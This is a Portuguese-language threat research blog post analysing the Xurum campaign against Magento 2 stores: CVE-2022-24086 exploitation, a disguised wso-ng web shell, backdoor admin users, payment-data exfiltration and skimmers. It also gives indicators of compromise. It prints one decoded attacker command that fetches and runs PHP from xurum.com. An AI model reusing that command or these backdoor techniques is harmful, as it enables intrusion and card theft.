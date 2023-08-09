Xurum: Nova campanha contra a Magento descoberta
Pesquisa por: Ron Mankivsky, Dennis German, Chen Doytshman, Maxim Zavodchik
Coautoria: Tricia Howard
Resumo executivo
Os pesquisadores da Akamai descobriram uma campanha de injeção de modelo no lado do servidor (CVE-2022-24086) que está explorando websites de comércio digital. Esta campanha tem como alvo as lojas Magento 2 e nós a apelidamos de Xurum em referência ao nome de domínio do servidor de comando e controle do invasor (C2).
Observamos atividade nesta campanha desde pelo menos janeiro de 2023. O invasor parece estar interessado nas estatísticas de pagamento da vítima dos pedidos feitos na loja Magento nos últimos 10 dias.
O invasor registra um novo componente Magento e o mascara como "GoogleShoppingAds".
O invasor usa um web shell avançado chamado "wso-ng" que é ativado somente quando o invasor envia o cookie "magemojo000" para o componente backdoor "GoogleShoppingAds".
A página de login do web shell é mascarada como uma página de erro contendo um formulário de login oculto que tenta recolher as credenciais da vítima.
O invasor cria um usuário administrador de backdoor na Magento, chamado "mageplaza" ou "mageworx", como outro truque de enganação, pois esses são os nomes das lojas de extensões populares da Magento.
O invasor usa a antiga exploração Dirty COW (CVE-2016-5195) para tentar aumentar o privilégio no Linux.
Evidências indicam que essa ameaça tem origens russas.
Alguns dos websites envolvidos nesta campanha foram observados como infectados com skimmers simples baseados em JavaScript, sem nenhuma tentativa de ofuscar ou esconder sua existência.
Introdução
O comércio digital é um setor muito visado pelos criminosos virtuais em geral, mas a Magento infelizmente se tornou um alvo bastante atraente (e lucrativo) devido à sua grande popularidade. O ataque específico mais relevante é o Magecart, no qual os invasores buscam implantar skimmers baseados em JavaScript para obter ilicitamente informações confidenciais dos usuários. Esses agentes de ameaça do Magecart exploram vulnerabilidades conhecidas da web para roubar esses dados.
As lojas Magento foram alvo de pelo menos sete grupos de ameaças desde 2015, o que demonstra a proeminência da plataforma e o sucesso que os agentes de ameaça alcançaram através dessa exploração.
No início de 2022, a vulnerabilidade CVE-2022-24086 surgiu, permitindo que os invasores explorassem o mecanismo de modelo da Magento e executassem o código PHP arbitrário em alvos suscetíveis. A exploração ocorre em várias etapas, com vetores de ataque comuns que envolvem a manipulação do processo de finalização de compra ou da funcionalidade de lista de desejos. Desde sua divulgação, essa vulnerabilidade se tornou um ponto de entrada principal para vários agentes de ameaça do Magecart, que visam as lojas Magento 2 vulneráveis.
Nos últimos meses, a Akamai vem monitorando de perto uma campanha focada que visa especificamente um número relativamente pequeno de implantações Magento. Apelidamos de campanha Xurum para fazer referência ao nome de domínio do servidor C2 utilizado pelos invasores.
Explorando a CVE-2022-24086 como acesso inicial
Durante a campanha em andamento, observamos invasores tentando executar duas cargas úteis distintas de um total de quatro endereços IP (Figura 1). Esses IPs estão associados à infraestrutura de dois provedores de hospedagem: Hetzner na Alemanha e Shock Hosting nos Estados Unidos.
A primeira variante executa a função PHP “file_get_contents” para enviar uma solicitação ao servidor C2 do invasor xurum.com e verificar se o servidor está vulnerável a CVE-2022-24086 (Figura 2), enquanto o bloco de dados Base64 é decodificado para https://xurum.com/mo.
A segunda variante é a carga útil da segunda etapa, na qual os invasores baixam e executam seu código PHP mal-intencionado, que é hospedado no mesmo servidor xurum.com. Para evitar a detecção, o segmento de exploração responsável por baixar e executar o código PHP mal-intencionado remoto é ofuscado usando a codificação Base64 e executado pela função PHP "shell_exec" (Figura 3). A parte ofuscada é decodificada para php -r "`wget -qO- https://xurum.com/b.txt`;".
Zona de descarte do Xurum.com
Durante nossa investigação sobre o servidor xurum.com, ficou evidente que ele está fisicamente localizado na Holanda (Figura 4) e hospedado pela empresa de hospedagem russa chamada VDSina.ru (Figura 5).
Na momento de nossa investigação, esse domínio não era considerado mal-intencionado por muitos sites conhecidos de classificação de ameaças (Figura 6). Essa legitimidade aparente cria mais confiança do usuário e permite que a operação do agente de ameaça seja executada essencialmente sob o radar.
O que significa "xurum"?
Como há várias iterações desse ataque, optamos por chamá-lo de xurum para distinguir esta campanha de outras.
Frequentemente, os invasores empregam convenções de nomenclatura distintas para seus domínios ou malware, que, inadvertida ou deliberadamente, servem como sua assinatura distinta. Durante nossa investigação sobre o possível significado de “xurum”, encontramos duas interpretações possíveis.
De acordo com o Google Tradutor, xurum significa “correto” em latim, sugerindo a ideia de “fazer o que é certo” (Figura 7). Por outro lado, o WordSense Dictionary indica que xurum é a palavra para "menino" em um idioma extinto falado na Guatemala (Figura 8).
Observe que, no momento da redação desta postagem no blog, os invasores retiraram o servidor xurum e fizeram a transição para outro que parece ainda estar na fase de garantia de qualidade.
Exfiltração de informações de pedidos e backdooring da Magento
O script PHP mal-intencionado que está sendo baixado do servidor xurum e executado na máquina vítima tem vários estágios de infecção.
Em primeiro lugar, ele coleta informações técnicas sobre a vítima, como:
versão de PHP
Se a exploração atingiu o diretório “/pub” (uma estrutura de diretórios comum na Magento)
Se o arquivo “/var/www/html/vendor/magento/google-shopping-ads/registration.php” existe e é gravável
O conteúdo do arquivo “env.php”, que inclui informações cruciais sobre o aplicativo da Magento, como configurações específicas do ambiente, mas também segredos, incluindo a chave de criptografia usada para proteger dados confidenciais, como senhas, detalhes de cartão de crédito e informações sobre o cliente
Em seguida, ele decodifica um bloco de dados ofuscado Base64 e o grava no arquivo “/var/www/html/vendor/magento/google-shopping-ads/registration.php” (Figura 9).
O novo arquivo contém um conteúdo intrigante. Em vez de manter sua própria cópia de um web shell e hospedá-la em seu servidor C2, o código contido no novo arquivo aponta para um repositório público do GitHub, pertencente a um pesquisador de segurança chamado "Bad Advertiser" ou "@0xbadad”. Dentro desse repositório, há um web shell conhecido chamado wso-ng. No entanto, o que torna isso especialmente interessante é que o web shell não está sendo gravado no disco do servidor. Nesse caso, ele é recuperado e executado apenas na memória quando a página recém-criada "registration.php" é acessada. Para reforçar a proteção contra acessos não autorizados, os invasores também exigem a presença de um cookie "magemojo000" específico na solicitação para que o web shell seja executado com êxito.
Em seguida, o invasor registra a nova funcionalidade de web shell como um novo componente da Magento mascarado como "GoogleShoppingAds" (Figura 10).
Depois de instalar o backdoor, os atacantes recuperam informações sobre os métodos de pagamento de pedidos de vendas nos últimos 10 dias e exfiltram esses dados para a zona de descarte xurum.com, juntamente com as informações técnicas coletadas anteriormente (Figura 11).
Na etapa final, os invasores criam um usuário administrador de backdoor chamado "mageworx" (ou "mageplaza" em algumas variações). Esses nomes correspondem a lojas de extensões populares da Magento 2, Mageworx e Mageplaza (Figura 12). Essa escolha de nomes parece ser uma tentativa de camuflar suas ações como algo legítimo relacionado a esses fornecedores de extensão respeitáveis.
Observe uma nuance interessante nos endereços de e-mail dos usuários do backdoor. No endereço de e-mail developer@mageplazza.com, há um duplo "z" em "mageplazza", embora o nome do domínio legítimo da loja tenha apenas um "z", mageplaza.com, o que parece ser um erro de digitação cometido pelos invasores. Um erro semelhante foi cometido no outro endereço de e-mail do usuário de backdoor: support@magaworx.com, com um "a" em vez de um "e" como no nome original da loja Mageworx.
Nova geração de web shell: wso-ng
Um web shell é um script mal-intencionado ou um trecho de código que os invasores carregam e executam em um servidor da Web para obter acesso não autorizado e controle sobre o servidor e seus arquivos e dados subjacentes de forma persistente.
Nesta operação, os invasores estão aproveitando a avançada web shell chamada wso-ng, que, como mencionado acima, foi criada por um pesquisador de segurança há vários anos. Conforme declarado pelo autor, wso-ng é uma nova geração do WSO mais antigo e famoso (que significa Web Shell por Orb).
Além da funcionalidade típica encontrada em web shells, como coleta de informações do sistema e gerenciamento de arquivos e SQL, o wso-ng tem outros recursos notáveis que fazem com que ele se destaque (Figura 13).
Novas características
Um desses novos recursos é a página de login oculta. Ao acessar a página, ela responde com um código de status HTTP 404 Not Found, dando a impressão de uma página inexistente. O conteúdo visível parece estar em branco à primeira vista (Figura 14). No entanto, ao inspecionar o código-fonte da página, ele revela um formulário de login oculto.
O formulário é inteligentemente ocultado do usuário com um truque CSS simples: ele é deslocado 1.000 pixels para a esquerda, permanecendo fora da área visível. Este formulário de login oculto foi projetado para aguardar o usuário digitar a senha.
Além disso, o wso-ng integra-se ao VirusTotal, permitindo verificações automáticas da reputação de IP da máquina infectada. Ele também consulta sem problemas o SecurityTrails, um serviço fornecido pela respeitável empresa de inteligência de ameaças Recorded Future, e o IPinfo para obter informações sobre outros domínios hospedados no mesmo servidor.
A web shell também possui recursos ofensivos, tentando escapar das sandboxes PHP das empresas de hospedagem. Ela emprega várias técnicas, incluindo as explorações FastCGI e php add-filter, para ignorar as funções PHP desativadas com sucesso. Além disso, oferece um recurso de sugestão automática para explorações de escalonamento de privilégios locais que são compatíveis com a versão específica do Linux na qual a web shell está hospedada.
Uma análise mais detalhada dessa estrutura da Web será fornecida em uma futura postagem no blog.
Elevando os privilégios com um Dirty COW à moda antiga
Encontramos outra ferramenta interessante no arsenal dos atacantes no servidor xurum.com: uma exploração pública de uma CVE-2016-5195 mais antiga chamada Dirty COW para escalonamento de privilégios locais no Linux (Figura 15).
Infecção por Web skimmer
Como muitos dos nossos clientes que utilizam o firewall de aplicações web (WAF) conseguiram mitigar essa campanha, não observamos diretamente outras ações tomadas pelos agentes de ameaça. No entanto, durante nossa investigação, notamos nomes de sites que estavam indiretamente relacionados a esta campanha e que mostraram no cabeçalho HTTP de origem/referencial da solicitação de exploração.
Pelo menos um desses sites foi infectado por um simples Web skimmer. O skimmer foi instalado na página principal e não aplicou nenhuma técnica de ofuscação. Ele coletava informações de cartões de crédito e as enviava para uma zona de descarte hospedada em “smileface.site” (Figura 16).
Na tentativa de acesso, esse site responde com uma mensagem fria "Saia!" (Figura 17).
As informações de IP mostram que o servidor está localizado em Moscou e hospedado pela empresa russa de hospedagem "reg.ru" (Figura 18).
Resumo
Nossa investigação sobre essa campanha indica que ela remonta, pelo menos, ao final de janeiro de 2023. Os invasores mostraram uma abordagem meticulosa, visando instâncias específicas da Magento 2 em vez de pulverizar indiscriminadamente suas explorações na Internet. Eles demonstram um alto nível de especialização na Magento e investem um tempo considerável na compreensão de seus componentes internos, na configuração da infraestrutura de ataque e no teste de suas explorações em alvos reais.
Essa campanha é um exemplo prático de como vulnerabilidades antigas continuam sendo exploradas anos após sua divulgação, enquanto as empresas se esforçam para acompanhar os patches e as medidas de segurança.
Recomendações de segurança
Para evitar o acesso inicial ao servidor, os profissionais de segurança devem manter seus sistemas atualizados com os patches mais recentes e complementar essa medida com a implementação de um WAF, como o Akamai App & API Protector.
Como o principal objetivo desses agentes de ameaça do Magecart é infectar páginas da Magento com web skimmers e roubar informações de cartões de crédito dos clientes, é altamente recomendável adotar soluções de segurança dedicadas adicionais para esse fim. Essas soluções devem fornecer visibilidade dos comportamentos de script do navegador e oferecer defesa contra ataques do lado do cliente.
Uma abordagem eficaz envolve a implantação de medidas de segurança mais próximas de onde ocorrem os ataques reais aos clientes. Isso inclui a identificação de tentativas de leitura de campos de entrada confidenciais e exfiltração de dados. Sugerimos a coleta imediata desses eventos para facilitar a mitigação rápida e eficiente com a ajuda de produtos de segurança, como o Client-Side Protection & Compliance.
Fique por dentro
Durante nossa análise das recentes tentativas de exploração Magento CVE-2022-24086 em nossos clientes, descobrimos campanhas adicionais que estão sendo investigadas no momento. Continuaremos a investigar mais e compartilhar nossas descobertas com a comunidade de segurança. Para acompanhar mais pesquisas recentes na área de segurança, siga nosso perfil no Twitter.
IOCs
Os seguintes indicadores de comprometimento (IOCs) são apresentados para ajudar a comunidade a detectar a atividade mal-intencionada descrita na postagem.
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Valor
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Tipo
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104.36.229.168
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IP de ataque
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95.216.95.178
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IP de ataque
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95.216.94.99
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IP de ataque
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65.21.85.21
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IP de ataque
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xurum.com
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Domínio de hospedagem de malware
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/var/www/html/vendor/magento/google-shopping-ads/registration.php
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Nome do arquivo
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mageworx
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Usuário Magento
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mageplaza
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Usuário Magento
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developer@mageplazza.com
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Endereço de e-mail
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support@magaworx.com
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Endereço de e-mail